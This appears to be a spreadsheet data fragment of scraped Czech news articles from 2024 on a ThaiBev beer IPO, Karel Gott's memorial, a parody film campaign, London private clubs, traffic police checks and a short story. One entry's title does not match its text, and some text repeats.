217,06 miliardy bahtů (6,7 miliardy USD) . Provozní zisk EBITDA vzrostl o 2,2 % a dosáhl 38,6 miliardy bahtů. Zajímavé je, že pivní divize BeerCo vykázala výrazný nárůst EBITDA o 10,2 % na 11,9 miliardy bahtů. Tento růst je důkazem potenciálu, který BeerCo přináší společnosti ThaiBev, a potvrzuje, že divize piva může být klíčovým hráčem na trhu v nadcházejících letech. S obnovením plánů na IPO společnosti BeerCo a zájmem potenciálních partnerů se ThaiBev připravuje na zásadní rozhodnutí, které může výrazně ovlivnit její budoucí vývoj. I když ještě nebyly zveřejněny konkrétní detaily o potenciálních partnerech či samotném IPO, je zřejmé, že společnost pečlivě zvažuje všechny možnosti, jak co nejlépe využít aktuálních tržních podmínek. Strategické rozhodnutí obnovit IPO přichází v době, kdy globální ekonomické podmínky vytvářejí příležitosti pro růst a expanzi. Zatímco IPO pivní divize bude pravděpodobně první velkým krokem, který ThaiBev podnikne, další možnosti, jako je expanze v oblasti lihovin, zůstávají otevřené. Firma je odhodlána využít příznivých podmínek na trzích a posílit svou pozici mezi předními hráči na asijském nápojovém trhu. V nadcházejících měsících bude klíčové sledovat, jak se bude situace vyvíjet a jaké rozhodnutí společnost přijme. IPO pivní divize BeerCo by mohlo představovat zásadní krok pro další růst a rozvoj ThaiBev, a pokud se podaří zapojit i kapitálového partnera, může to znamenat ještě silnější pozici pro budoucí expanzi. Thai Beverage Pcl, jedna z největších asijských nápojářských společností, obnovuje své plány na uvedení své pivní divize BeerCo na burzu. Tento krok přichází v době, kdy globální akciové trhy zažívají významnou rally, což vytváří příznivé podmínky pro primární veřejnou nabídku akcií. Společnost rovněž uvažuje o zapojení kapitálového partnera, což by mohlo podpořit růstovou trajektorii a zajistit větší stabilitu pro budoucí expanzi. O obnovení plánů na IPO informoval Michael Chye, šéf skupiny pivních produktů ThaiBev, během setkání s novináři v thajském hlavním městě Bangkoku . Podle jeho slov by IPO mohlo proběhnout již ve třetím čtvrtletí příštího roku, za předpokladu, že se podaří dojednat specifika prodeje akcií do konce letošního roku. Tento časový rámec závisí na dalších faktorech, včetně tržních podmínek a případné dohody s potenciálními partnery. Obnovení plánů na IPO přichází dva roky poté, co společnost ThaiBev, pod vedením thajského miliardáře Charoena Sirivadhanabhakdiho, pozastavila původní plány kvůli nepříznivým tržním podmínkám. V té době se firma pokoušela získat prostřednictvím IPO až 1 miliardu USD, avšak slabé akciové trhy přiměly vedení k pozastavení tohoto kroku. Dnes se však situace změnila. Globální akciové trhy zaznamenávají růst, centrální banky po celém světě uvolňují měnovou politiku a snižují úrokové sazby, což zvyšuje atraktivitu pro investory. „Úrokové sazby celosvětově klesají a akciové trhy opět silně stoupají. Proto jsme se rozhodli znovu zvážit možnost IPO. O konečném rozhodnutí bychom mohli rozhodnout během několika měsíců,“ řekl Chye. Zájem o IPO společnosti BeerCo je výrazný nejen mezi investory, ale také mezi potenciálními partnery. Výkonný ředitel ThaiBev, Thapana Sirivadhanabhakdi, potvrdil, že firma jedná se dvěma možnými partnery, kteří by se mohli zapojit do pivní divize. I když Sirivadhanabhakdi potvrdil plány na IPO, zdržel se komentáře ohledně toho, zda bude mít BeerCo kapitálového partnera, pokud prodej akcií proběhne podle plánu. ThaiBev rovněž zvažuje možnosti, jak diverzifikovat své portfolio a využít dalších příležitostí na trzích. Již dříve se objevily spekulace, že společnost plánuje IPO své divize lihovin v Singapuru . První rozhovory s bankami naznačily, že by mohlo dojít k prodeji podílu ve výrobci thajských likérů, jako jsou Mekhong a Ruang Khao. Přesto se zdá, že prioritou pro vedení společnosti zůstává pivní divize. Podle prezidenta a šéfa divize lihovin společnosti ThaiBev, Prapakona Thongtheppairota, má IPO pivní divize přednost, protože může připravit půdu pro budoucí rozvoj dalších částí společnosti. „Plány na IPO pivní divize jsou pro nás prioritou. Věříme, že to bude klíčový krok pro další růst společnosti a přípravu na možné uvedení dalších divizí na burzu,“ uvedl Thongtheppairot. Ekonomické výsledky ThaiBev za uplynulých devět měsíců, které skončily v červnu letošního roku, ukazují stabilitu společnosti. Tržby se oproti předchozímu roku příliš nezměnily a činily 217,06 miliardy bahtů. Provozní zisk EBITDA vzrostl o 2,2 % a dosáhl 38,6 miliardy bahtů. Zajímavé je, že pivní divize BeerCo vykázala výrazný nárůst EBITDA o 10,2 % na 11,9 miliardy bahtů. Tento růst je důkazem potenciálu, který BeerCo přináší společnosti ThaiBev, a potvrzuje, že divize piva může být klíčovým hráčem na trhu v nadcházejících letech. S obnovením plánů na IPO společnosti BeerCo a zájmem potenciálních partnerů se ThaiBev připravuje na zásadní rozhodnutí, které může výrazně ovlivnit její budoucí vývoj. I když ještě nebyly zveřejněny konkrétní detaily o potenciálních partnerech či samotném IPO, je zřejmé, že společnost pečlivě zvažuje všechny možnosti, jak co nejlépe využít aktuálních tržních podmínek. Strategické rozhodnutí obnovit IPO přichází v době, kdy globální ekonomické podmínky vytvářejí příležitosti pro růst a expanzi. Zatímco IPO pivní divize bude pravděpodobně první velkým krokem, který ThaiBev podnikne, další možnosti, jako je expanze v oblasti lihovin, zůstávají otevřené. Firma je odhodlána využít příznivých podmínek na trzích a posílit svou pozici mezi předními hráči na asijském nápojovém trhu. V nadcházejících měsících bude klíčové sledovat, jak se bude situace vyvíjet a jaké rozhodnutí společnost přijme. IPO pivní divize BeerCo by mohlo představovat zásadní krok pro další růst a rozvoj ThaiBev, a pokud se podaří zapojit i kapitálového partnera, může to znamenat ještě silnější pozici pro budoucí expanzi. Zanechte svůj telefon a email a budete kontaktováni licencovanými odborníky [telegram] Δ Související: Autor: Jan Golda Autor person Jan Golda Rubrika transition_slide Akcie</t>
  </si>
  <si>
    <t>1830</t>
  </si>
  <si>
    <t>3810</t>
  </si>
  <si>
    <t>20241001_97_2995629280_618656e9f33d7cddef93.html</t>
  </si>
  <si>
    <t>618656e9f33d7cddef93</t>
  </si>
  <si>
    <t>Pět let od úmrtí Karla Gotta: Vzpomíná i Děčínsko, síly Mistr nabíral v Doubici</t>
  </si>
  <si>
    <t>Pět let od úmrtí Karla Gotta : Vzpomíná i Děčínsko, síly Mistr nabíral v Doubici Karel Gott si před sedmi lety postavil v Doubici chalupu, na kterou pravidelně jezdil. Ta se stala také oblíbeným cílem jeho fanoušků, kteří chtěli na vlastní oči vidět, kde zpěvák tráví volné chvíle. Kvůli obrovskému zájmu dokonce musela obec nainstalovat do uliček vedoucích ke Gottově roubence zákaz vjezdu. Za Mistrem do Doubice dorazili také filmaři, kteří natáčeli dokument o jeho životě. Po Doubici Karel Gott chodil na procházky a zašel si také rád do některé z místních hospod na pivo . Volna si v nejmenší obci na Děčínsku zkrátka užíval stejně jako ostatní chalupáři. „Nikdy jsem nepotkal tak slušného člověka, jako byl Karel Gott . První slova, která mě napadnou, když se řekne Karel Gott , je slušnost a hodnost. Když se s ním člověk loučil, tak mu třikrát popřál krásný den,“ podělil se těsně po Gottově úmrtí o vzpomínky na zpěváka Filip Molčan z Doubice . Zprávy z Česka Po Gottově úmrtí se přímo u chalupy na okraji Doubice objevily svíčky, pietní místo zřídila obec také u kostela. Svíčky ale plály i v Děčíně na kašně na Masarykově náměstí, před obchodem v Želenicích nebo u křížku vedle obecního úřadu v Lipové. Karlu Gottovi bylo v říjnu 2015 diagnostikováno zhoubné nádorové onemocnění mízních uzlin, 18. března 2016 média informovala, že rakovinu porazil. V září 2019 se u něj však objevila akutní leukémie, kvůli které zrušil veškerá nadcházející vystoupení a zahájil léčbu. Zemřel před půlnocí 1. října ve věku 80 let. Autor: Jitka Vepřovská Autor Jitka Vepřovská</t>
  </si>
  <si>
    <t>14100</t>
  </si>
  <si>
    <t>5950</t>
  </si>
  <si>
    <t>20241001_98_2995595323_c85f44733a7d843c8a94.html</t>
  </si>
  <si>
    <t>c85f44733a7d843c8a94</t>
  </si>
  <si>
    <t>Bába pod kořenem míří do kin. Adaptaci českého bizáru napsal scenárista Elišky a Damiána</t>
  </si>
  <si>
    <t>Bába pod kořenem míří do kin. Adaptaci českého bizáru napsal scenárista Elišky a Damiána Známá reportáž o tzv. bábě pod kořenem. | TV Nova Takové jsou alespoň plány zakladatele pražského kina Balt, Davida Paškeviče. Kino si staví jméno na tom, že často promítá snímky pochybné kvality a diváci si zde mohou užít nevšední, alkoholem obohacený zážitek. O tom, že se v Baltu bizáru nebojí, svědčí fakt, že Paškevič s Michalem Přibylem letos uvedli už dokument Mortal Kára zabývající se vznikem dokumentu o svatbě Jiřího Káry i jeho následném fenoménu. Ve snímku nazvaném Kořenový vězeň však chtějí jít ještě mnohem dál. 75 % Skutečný příběh Zdeňky Novotné, která se osudového dne při procházce lesem zaklínila pod stromem a nalezena kamarády byla až po několika hodinách, přičemž ji za chladné noci zahřívala její moč, se dočká poněkud přepálené aktualizace. Paškevič a jeho tým okolo virálního fenoménu vystaví příběh jak z těch nejobskurnějších amerických béček. Hlavní hrdinka Zdena totiž ve filmu dle synopse z oné noci zapomněla jednu zásadní vzpomínku – byla totiž znásilněna členem stromové rasy, které hrozí vyhynutí. Nyní je hlavní hrdinka těhotná a čeká jakéhosi stromového hybrida. Do příběhu pak zasáhne také Lord Špekáček, oživlý buřt, který spadl jednomu z táborníků na zem. „Rádi bychom se přiblížili snímkům, jako je The VelociPastor, CarousHell nebo z českého rybníčku skvělému filmu Párty Hárder: Summer Massacre,“ přibližují tvůrci svůj záměr v oficiálních materiálech ke kampani na webu Hithit. „Chceme natočit tak špatný film, až bude skvělý,“ dodává Paškevič v promo videu. Přijde vám to celé šílené? Tak věřte, že je to celé ještě šílenější. Scénář má totiž na starosti David Litvák , autor jednoho z nejhůře hodnocených seriálů posledních let, Elišky a Damiána, či primáckého propadáku Jetelín. Což je volba, která se jeví být v duchu projektu tak podivnou a nevhodnou, až může být dobrá. Kořenový vězeň: trailer | Balt Cinema Tvůrci tedy aktuálně rozjeli kampaň na platformě Hithit, která by měla pomoci chystaný projekt rozjet. K natočení snímku ve skromných podmínkách hodlají autoři vybrat aspoň 150 tisíc korun, pro pohodlné natočení podle plánu ovšem potřebují minimálně 600 tisíc korun, za 900 tisíc slibují tvůrci i přidání speciálních efektů a animovanou historku o vzniku lidstva. Zatím se dá jen těžko odhadovat, jak moc budou ve své snaze úspěšní, rádi by ovšem výsledek poslali do kin už příští červen v rámci béčkového festivalu Naruby v kině Balt . „Ale věřím, že to uvidí i lidé v desítkách dalších kin po republice. Například zmiňovaný dokument Mortal Kára promítalo už 36 kin. A dostat se do multiplexu by bylo neuvěřitelné, považoval bych to za zázrak,“ řekl Paškevič v rozhovoru pro web CzechCrunch a chce lidi zejména královsky pobavit. „Oslovili jsme původního reportéra Davida Pika a nápad se mu líbil. Ale jeho účast záleží i na povolení TV Nova. Ozvali jsme se samozřejmě i paní Zdeně, ale bohužel bez úspěchu,“ dodává Paškevič v rozhovoru. Tak uvidíme, zda budou příští léto lidé po celé republice volat v kinech „Zdenoooo!“ Chtěli byste něco takového vidět? Podívejte se na žebříček nejlepších českých komedií podle databáze Kinoboxu. Zdroj: CzechCrunch , kino Balt, HitHit Související osoby Autor: Milan Rozšafný Autor person Milan Rozšafný</t>
  </si>
  <si>
    <t>69030</t>
  </si>
  <si>
    <t>62590</t>
  </si>
  <si>
    <t>20241001_99_2995557246_ebba486ba3045b5f9f34.html</t>
  </si>
  <si>
    <t>ebba486ba3045b5f9f34</t>
  </si>
  <si>
    <t>Poznej svého ducha (nebo démona), vyzývá Rubenczal, pohanský duch Krkonoš a ultimátní běžecký závod</t>
  </si>
  <si>
    <t>Shrnutí Bába pod kořenem míří do kin. Adaptaci českého bizáru napsal scenárista Elišky a Damiána Známá reportáž o tzv. bábě pod kořenem. | TV Nova Takové jsou alespoň plány zakladatele pražského kina Balt, Davida Paškeviče. Kino si staví jméno na tom, že často promítá snímky pochybné kvality a diváci si zde mohou užít nevšední, alkoholem obohacený zážitek. O tom, že se v Baltu bizáru nebojí, svědčí fakt, že Paškevič s Michalem Přibylem letos uvedli už dokument Mortal Kára zabývající se vznikem dokumentu o svatbě Jiřího Káry i jeho následném fenoménu. Ve snímku nazvaném Kořenový vězeň však chtějí jít ještě mnohem dál. 75 % Skutečný příběh Zdeňky Novotné, která se osudového dne při procházce lesem zaklínila pod stromem a nalezena kamarády byla až po několika hodinách, přičemž ji za chladné noci zahřívala její moč, se dočká poněkud přepálené aktualizace. Paškevič a jeho tým okolo virálního fenoménu vystaví příběh jak z těch nejobskurnějších amerických béček. Hlavní hrdinka Zdena totiž ve filmu dle synopse z oné noci zapomněla jednu zásadní vzpomínku – byla totiž znásilněna členem stromové rasy, které hrozí vyhynutí. Nyní je hlavní hrdinka těhotná a čeká jakéhosi stromového hybrida. Do příběhu pak zasáhne také Lord Špekáček, oživlý buřt, který spadl jednomu z táborníků na zem. „Rádi bychom se přiblížili snímkům, jako je The VelociPastor, CarousHell nebo z českého rybníčku skvělému filmu Párty Hárder: Summer Massacre,“ přibližují tvůrci svůj záměr v oficiálních materiálech ke kampani na webu Hithit. „Chceme natočit tak špatný film, až bude skvělý,“ dodává Paškevič v promo videu. Přijde vám to celé šílené? Tak věřte, že je to celé ještě šílenější. Scénář má totiž na starosti David Litvák , autor jednoho z nejhůře hodnocených seriálů posledních let, Elišky a Damiána, či primáckého propadáku Jetelín. Což je volba, která se jeví být v duchu projektu tak podivnou a nevhodnou, až může být dobrá. Kořenový vězeň: trailer | Balt Cinema Tvůrci tedy aktuálně rozjeli kampaň na platformě Hithit, která by měla pomoci chystaný projekt rozjet. K natočení snímku ve skromných podmínkách hodlají autoři vybrat aspoň 150 tisíc korun, pro pohodlné natočení podle plánu ovšem potřebují minimálně 600 tisíc korun, za 900 tisíc slibují tvůrci i přidání speciálních efektů a animovanou historku o vzniku lidstva. Zatím se dá jen těžko odhadovat, jak moc budou ve své snaze úspěšní, rádi by ovšem výsledek poslali do kin už příští červen v rámci béčkového festivalu Naruby v kině Balt . „Ale věřím, že to uvidí i lidé v desítkách dalších kin po republice. Například zmiňovaný dokument Mortal Kára promítalo už 36 kin. A dostat se do multiplexu by bylo neuvěřitelné, považoval bych to za zázrak,“ řekl Paškevič v rozhovoru pro web CzechCrunch a chce lidi zejména královsky pobavit. „Oslovili jsme původního reportéra Davida Pika a nápad se mu líbil. Ale jeho účast záleží i na povolení TV Nova. Ozvali jsme se samozřejmě i paní Zdeně, ale bohužel bez úspěchu,“ dodává Paškevič v rozhovoru. Tak uvidíme, zda budou příští léto lidé po celé republice volat v kinech „Zdenoooo!“ Chtěli byste něco takového vidět? Podívejte se na žebříček nejlepších českých komedií podle databáze Kinoboxu. Zdroj: CzechCrunch , kino Balt, HitHit Související osoby Autor: Milan Rozšafný Autor Tomáš Nohejl</t>
  </si>
  <si>
    <t>651</t>
  </si>
  <si>
    <t>1.11</t>
  </si>
  <si>
    <t>20241101_1_3264739961_900b7dbc04c76957d75d.html</t>
  </si>
  <si>
    <t>900b7dbc04c76957d75d</t>
  </si>
  <si>
    <t>Předvánoční bižuterní kurz pořádají v jabloneckém muzeu</t>
  </si>
  <si>
    <t>Shrnutí Předvánoční bižuterní kurz pořádají v jabloneckém muzeu 01.11.2024 23:58:25 | Autor: Šárka Labusová | Rubrika: Volný čas | Obce: Jablonec nad Nisou Muzeum skla a bižuterie v Jablonci nad Nisou zve zručné milovníky bižuterie na další lekci z cyklu oblíbených bižuterních kurzů pro pokročilé. Uskuteční se v sobotu 2. listopadu od 10 hodin. Pro předem objednané zájemce připravila lektorka Věra Černá workshop s výrobou vánočních hvězdiček - sněhových vloček - šitých z broušených korálků a rokajlu. Kurz je vhodný zejména pro mírně pokročilé dospělé, ale hlásit se mohou i šikovní začátečníci. „Vánoční hvězdičky využijete jako nápaditou bižuterii nebo drobnou dekoraci," zve edukátorka Dana Křivánková . Pro účast je nutná rezervace předem, a to nejpozději do 30. října. Kurzovné činí 300,- Kč a zahrnuje materiál i lektorské vedení. Sdílet s přáteli na facebooku Naše Jablonecko s.r.o. ( Internetové služby , Firmy ) , ODS Jablonec ( Volby ) , Petr Rubín - REKUPER ( ) , TOP09 Jablonec ( Volby ) , VisionWorks ( Internetové služby , Firmy ) | Další firmy Autor: Šárka Labusová Autor person Šárka Labusová Rubrika transition_slide Dílny a kurzy</t>
  </si>
  <si>
    <t>1580</t>
  </si>
  <si>
    <t>20241101_10_3264657067_f303e24a3a873c0c00a3.html</t>
  </si>
  <si>
    <t>f303e24a3a873c0c00a3</t>
  </si>
  <si>
    <t>Královské rodiny, celebrity, drogy a sexuální obtěžování: Tajemství londýnských soukromých klubů z pohledu jejich zaměstnanců</t>
  </si>
  <si>
    <t>Královské rodiny, celebrity, drogy a sexuální obtěžování: Tajemství londýnských soukromých klubů z pohledu jejich zaměstnanců Exkluzivní soukromé londýnské kluby nejsou jen místem pro relaxaci, ale i světem tajemství a intrik. Zaměstnanci zde pravidelně čelí výstřelkům členů královské rodiny, celebrit i politiků – od ponižujících úkolů až po nepsaná pravidla, která pomáhají zakrýt nevhodné chování. Jak vypadá život za těžkými dveřmi klubů, kde mají peníze a status přednost před vším ostatním? Autor 1. 11. 2024 Píše se rok 2021 a dvaadvacetiletý Freddie pracuje jako číšník stážista v exkluzivním soukromém klubu v londýnském West Endu. Na návštěvu zavítal evropský monarcha, který má ve vinném sklípku klubu vlastní výběr ročníků. Ten si vybral jednu z nejlepších lahví – v hodnotě 450 000 korun – aby si ji mohl vychutnat s přáteli. Když však Freddie přináší lahev a otevírá ji, s hrůzou zjistí, že víno je zašpuntované. To znamená, že má vadný korek, což způsobuje nepříjemnou, zatuchlou vůni a chuť, která kazí celkový zážitek z pití. A právě on musí králi oznámit tuto špatnou zprávu. „ Vyletěl a udělal scénu, až si ostatní členové začali stěžovat na jeho křik, “ říká Freddie. „ Bylo to ponižující. Pak jsem ještě dostal vyhubováno od manažera – jak to u stážistů chodí – přestože to nebyla moje chyba.“ Místní tradiční soukromé kluby mají historii sahající až do 19. století. Často se v nich vyžaduje striktní dress code a členský poplatek vysoký tak, že by kdekomu mohl způsobit šok. Například roční členství v klubu White's – nejstarším pánském klubu v Londýně – stojí prý 2,5 milinou korun. V Mark's Clubu v Mayfairu mají ženy zakázáno nosit „lehké džíny“ a muži musí mít vždy formální sako a elegantní košili s límečkem. Jiné, uvolněnější kluby lákají na DJ večery, lázeňské procedury a příslib networkingu. V jednom populárním klubu jsou obleky striktně zakázány, aby se prý zachovala kreativní atmosféra. Londýnské soukromé kluby sdílí několik společných rysů: přísná přijímací řízení, dlouhé čekací listiny a vysoké procento členů, kteří klubové prostory hrdě označují ve svých příspěvcích na Instagramu. Zaměstnanci těchto míst však také mají jedno společné – množství naprosto bizarních pracovních příběhů. Jack, který pracoval rok jako recepční v jednom ze známých klubů, říká, že většina jeho slavných členů byla úžasná. „ Nepotkáte každý den při snídani Emmu Stone , která se vás ptá, kde je toaleta, “ směje se. „ Z té práce mám historky na celý život. “ Ale existuje určitý typ členů, kteří se ke zaměstnancům často chovají nevychovaně. „ Dokážu si ho představit – mladý, umělecký typ, většinou hetero, nejspíš z Kentu . Má na sobě hromadu prstenů a bundu Barbour. Myslí si, že je hrozně cool, a s vámi bude nejspíš jednat, jako byste byli podřadní. “ Na recepci Jack zažil mnohokrát situaci, kdy členové královské rodiny chtěli sedět mezi ostatními návštěvníky, ale jejich bodyguardi jim to zakazovali. Jejich reakce byla taková, že jim ale přece nevadí sedět vedle „plebsu“. Tipy redakce Jednoho večera byl požádán, aby pracoval později než obvykle, protože se jedna áčková filmová hvězda rozhodla pronajmout si kino a uzavřít tak celý klub pro všechny ostatní členy. „ Zpočátku jsem byl naštvaný, ale můj názor se změnil, když jsem zjistil, kdo to byl a proč to udělal, “ vzpomíná. „ Velmi podobně jako ve filmu Ďábel nosí Pradu , kde Miranda Priestly získá ještě před vydáním poslední román o Harrym Potterovi, získal dětský film před jeho uvedením do kin a pronajal si tenhle sál, aby ho mohli zhlédnout spolu s jeho dcerou k jejím narozeninám. “ Manažer této hvězdy požádal Jacka, aby na pozdější dobu rezervoval stůl v nedaleké michelinské restauraci i pro další členy rodiny, která ale tou dobou měla mít zavřeno. Řekl mu, ať to neřeší a řekne jim, čí jménem volá, že to pochopí. Nebyl s tím žádný problém. „ Všichni zaměstnanci té restaurace a rodina té hvězdy byli milí, ale ona a její manažer nijak zvlášť, “ pokračuje Jack. „ Vzal jsem je do kina, aby se setkali se zbytkem lidí, a když jsem jim otevřel dveře, rázně se kolem mě protlačili, ani nepoděkovali a práskli mi dveřmi před nosem.“ Číšník v soukromém luxusním klubu musí mít kvůli marnotratným a arogantním klientům občas nervy ze železa. Odměnou za výdrž jsou mu celoživotní vzpomínky na výjimečné události Foto: Adobe Stock Freddie vzpomíná na známého britského politika, který do klubu přicházel třikrát až čtyřikrát týdně, pokaždé s výrazně mladším mužem. Jejich společné obědy měly vysoce sexuální nádech, přestože členové se v klubu většinou snažili chovat vůči ostatním korektně. To však neplatilo vůči personálu, který často čelil sexuálnímu obtěžování. „ Kolegyně, se kterou jsem pracoval, byla pravidelně osahávána – všichni to ignorovali, jako by to bylo normální,“ popisuje Freddie. Dále říká, jak někteří členové na něj při objednávání luskali prstem nebo na něj volali „chlapče“. Obzvláště ve chvíli, kdy si tito hosté přivedli své nové známé, jejich povýšené chování vůči personálu často ještě vzrostlo. „ Dělali by všechno pro to, aby vám naznačili, že děláte něco špatně, třeba když špatně vyslovíte název francouzského sýra, nebo když řeknete, že jahody jsou ještě aktuální sezónní ovoce, i když jejich sezóna oficiálně skončila jen před pár dny. Je to ubohé, ale musíte s nimi hrát jejich vlastní hru a rychle se vždy vzpamatovat. Jejich úkol je vás dostat, váš úkol je to vydržet. “ Jednou během školení na Freddieho křičela hostka, protože mu trvalo příliš dlouho, než jí u stolu vyfiletoval platýse. Očekávala, že to bude trvat 45 sekund a méně. „ Třásly se mi ruce. Ona se na mě chvíli jen dívala a pak začala křičet: ‚Co je to za kluka? Jak to mám sníst?‘ “ Freddieho manažerka, která byla přítomna, se ho nezastala. „ Všichni na mě jen zírali. Nikdy nezapomenu na to ponížení, které jsem cítil - bylo to tak trochu, jako byste pro ně byli otroky.“ Mezi jeho „standardní“ popis práce patřila také pomoc členům klubu se získáváním drog. „ Tihle lidé mají spoustu peněz a mohou si dovolit cokoliv – a my se jim to vždy snažili zajistit. “ *Jména byla změněna **Žádný z incidentů zmíněných v tomto článku se neodehrál ve White's nebo Mark's Clubu. Zdroj: © The Standard Ltd, standard.co.uk, cntraveller.com, researchgate.net Populární Autor: Michal Černý Autor person Michal Černý</t>
  </si>
  <si>
    <t>11410</t>
  </si>
  <si>
    <t>35290</t>
  </si>
  <si>
    <t>20241101_100_3264617459_9defcccd6aef910b1833.html</t>
  </si>
  <si>
    <t>9defcccd6aef910b1833</t>
  </si>
  <si>
    <t>Pivovary</t>
  </si>
  <si>
    <t>Pivovary Gose Lemon Rosemary Ginger 12 gose Pastry Sour Magical Forest 19 pastry sour Imperial Stout – Whisky Barrel Aged 31 imperial stout Torpid Mind 24 (alk.: 10,5 %), russian imperial sout. on 09/11/2024 Knížecí pivovar Plasy Metternich 12 - pivo vídeňského typu. on 09/11/2024 Kocour Varnsdorf Fresh Hop Ležák 13. Ve spolupráci se statkem Vodňanský letos na jejich chmelnici ručně načesali hlávky ŽPČ. on 09/11/2024 Vesnický pivovar Ohrada Vídeňská 11 (alk.: 4,7 %). on 09/11/2024 Pivovar Tambor Dvůr Králové Autor: admin Rubrika transition_slide News</t>
  </si>
  <si>
    <t>583</t>
  </si>
  <si>
    <t>340</t>
  </si>
  <si>
    <t>20241101_101_3264627559_167026966463b395d11d.html</t>
  </si>
  <si>
    <t>167026966463b395d11d</t>
  </si>
  <si>
    <t>VIDEO: Silně opilý řidič po nehodě utíkal před policisty</t>
  </si>
  <si>
    <t>Shrnutí VIDEO: Silně opilý řidič po nehodě utíkal před policisty 1. 11. 2024 Martina Kadlecová KRIMI, Pardubický kraj ilustrační foto (zdroj shutterstock) SVITAVSKO – Muž pod vlivem alkoholu v sobotu kolem šesté hodiny večer v Koclířově usedl za volant a vyjel si do města k bankomatu. Přitom naboural cizí auto u nemocnice. Sedmašedesátiletý muž popíjel alkohol a navečer si vzpomněl, že potřebuje vybrat peníze z automatu. Rozjel se směrem do Svitav a po cestě zjistil, že má prázdné kolo, které se pokusil vyměnit. „To se mu ovšem nepodařilo a ve své jízdě pokračoval dál. Nezastavil ho dokonce ani náraz do jednoho ze zaparkovaných vozidel u svitavské nemocnice. Po několika kilometrech už byl ale řidič na silnici I/34 ve směru zpět na Koclířov donucen zastavit z důvodu devastačního poškození kola,“ objasnila mluvčí policie Iveta Kopecká . Na linku 158 mezitím volal svědek a nahlásil opilého muže policistům. Ti přijeli a chtěli ho zkontrolovat, on však začal utíkat do pole. Během chvilky ho doběhli a zadrželi. Provedli u něho zkoušku na alkohol , která dopadla pozitivně. Naměřili mu 1,8 promile. Policisté proto zahájili úkony trestního řízení pro podezření ze spáchání trestného činu ohrožení pod vlivem návykové látky. Pokud bude muž odsouzen, odsedí si za mřížemi až tři roky. https://youtu.be/edZ59sdxJWE?feature=shared Autor: Martina Kadlecová Autor person Martina Kadlecová Rubrika transition_slide KRIMI</t>
  </si>
  <si>
    <t>2730</t>
  </si>
  <si>
    <t>20241101_102_3264784247_09992602f5e769900ba2.html</t>
  </si>
  <si>
    <t>09992602f5e769900ba2</t>
  </si>
  <si>
    <t>Policie při kontrole nehodového úseku na Českolipsku zabavila 3 řidičské průkazy</t>
  </si>
  <si>
    <t>Policie při kontrole nehodového úseku na Českolipsku zabavila 3 řidičské průkazy 1. listopadu 2024 16:52 ilustrační snímek | foto: Metro.cz Na dopravně rizikový úsek silnice I/38 u Doks na Českolipsku se ve čtvrtek zaměřili policisté. V minulosti se na ní stalo několik vážných nehod, poslední letos v červenci si vyžádala dvě oběti. Policisté při čtvrteční preventivní akci zadrželi tři řidičské průkazy. Dvěma řidičům kvůli tomu, že v úseku s povolenou 90kilometrovou rychlostí jeli skoro 150 kilometrů za hodinu, a třetímu rychle jedoucímu řidiči i kvůli opilosti. Na webu policie o tom dnes informovala její regionální mluvčí Ivana Baláková. Dopravní policisté se zaměřili na úsek mezi obcemi Obora a Bezděz , kde v červenci po čelním střetu dvou vozidel zemřeli oba řidiči a další čtyři lidé, z toho tři děti, utrpěli vážná zranění. Podle svědků jel tehdy po I/38 z Mladé Boleslavi na Českolipsko velmi riskantně řidič vozu Volkswagen Passat, když u Obory vyjel do protisměru a smetl ze silnice dodávku. "Včerejší (čtvrteční) výsledky měření rychlosti v tomto úseku jen potvrdily, že si tu řidiči s překračováním rychlostních limitů starosti příliš nedělají. Radary zaznamenaly během čtyř hodin překročení dovolené rychlosti u 21 z nich, přičemž se zjištěné hodnoty většinou pohybovaly na devadesátce od 120 kilometrů za hodinu výše," uvedla Baláková. Dva řidiči jeli dokonce rychlostí 147 a 149 kilometrů za hodinu. Právě jim policisté zabavili řidičský průkaz a jejich přestupek oznámili do správního řízení. "V něm skončí i řidič, kterému naměřili 128 kilometrů v hodině, a byl navíc pod vlivem alkoholu," dodala mluvčí policie. Mezi další zjištěné prohřešky při čtvrteční preventivní akci patřilo nebezpečné předjíždění v místech, kde to zakazuje dopravní značka, nebo přes plnou čáru před horizontem. "To kolegové ocenili pětitisícovou pokutou. Někteří řidiči se také 'zapomněli' připoutat bezpečnostním pásem," uvedla Baláková. Silnici podle ní využívají ve větší míře obyvatelé Českolipska, kteří dojíždějí do zaměstnaní na směny do Středočeského kraje . "Proto je velmi frekventovaná a vysoká rychlost ani další rizikové chování na ni rozhodně nepatří. Dopravní policisté budou tomuto úseku i nadále věnovat zvýšenou pozornost," dodala mluvčí policie. Autor: ČTK Autor: ČTK Autor ČTK</t>
  </si>
  <si>
    <t>4170</t>
  </si>
  <si>
    <t>20241101_103_3264783295_aa46d18991c5bb1aab99.html</t>
  </si>
  <si>
    <t>aa46d18991c5bb1aab99</t>
  </si>
  <si>
    <t>Genderové dilema tetřeva Kamila</t>
  </si>
  <si>
    <t>Genderové dilema tetřeva Kamila Povídka o novém přístupu Národního parku Šumava k ochraně populace tetřevů tetřevů a o nečekaných těžkostech, které to přineslo jednomu furríkovi. „Ak-ak-ak-ak-ak.“ Ozvalo se poplašeně tetřevím tokaništěm, jakmile se tam objevil. Okamžitě skončilo pukání, trylky i výlusky. Majestátní tetřevi hlučně odlétali i se svými slípkami, naposledy ti, kteří právě brousili. V takovou chvíli tetřev, druhovým jménem hlušec, nejen neslyší, ale ani nevidí. On sám díky chybě ve své genetické dispozici nebyl „hlušec“. Ale jak těm ostatním záviděl! A nejen schopnost broušení, při kterém jim jejich fyzické dispozice umožní se na pár vteřin ponořit jen a jen do tokání. Jak to musí být krásné, přestat vnímat svět kolem sebe. O tom si on mohl nechat jen zdát. Jeho ušní blána nebyla přizpůsobena na takové prokrvení, aby ho při broušení ohlušila. Ale už dávno byl smířen s tím, že jeho fyzické schopnosti jsou proti ostatním tetřevům omezené. Ale i tak dělal, co mohl. Teď se alespoň usadil na stromě a začal mlaskat a brousit, i když bylo předem jasné, že na vyprázdněné tokaniště dnes už žádnou slepici nepřiláká. - - - - Inzerát na stránkách Šumavského národního parku v sekci Veřejná deska: Přijmeme avians furry tetřeva, případně příbuzného z čeledi hrabavých. Požadavky: min. středoškolské vzdělání, přírodovědné znalosti, nadšení z práce, kostým vlastní Nabízíme: nepravidelnou pracovní dobu (intenzivně od března do července), stravenky, firemní vzdělávání, penzijní připojištění - - - - „Ale chtěl jste tetřeva a on je tetřev.“ „Ale kohout. Já potřebuju slepici.“ „A není to proboha jedno? Sehnala jsem vám jediného tetřeva v republice, možná v celé Evropě , a vám to ještě nestačí.“ Personalistka Alena stála nad stolem pokrytým životopisy s výhružně založenýma rukama, ale z 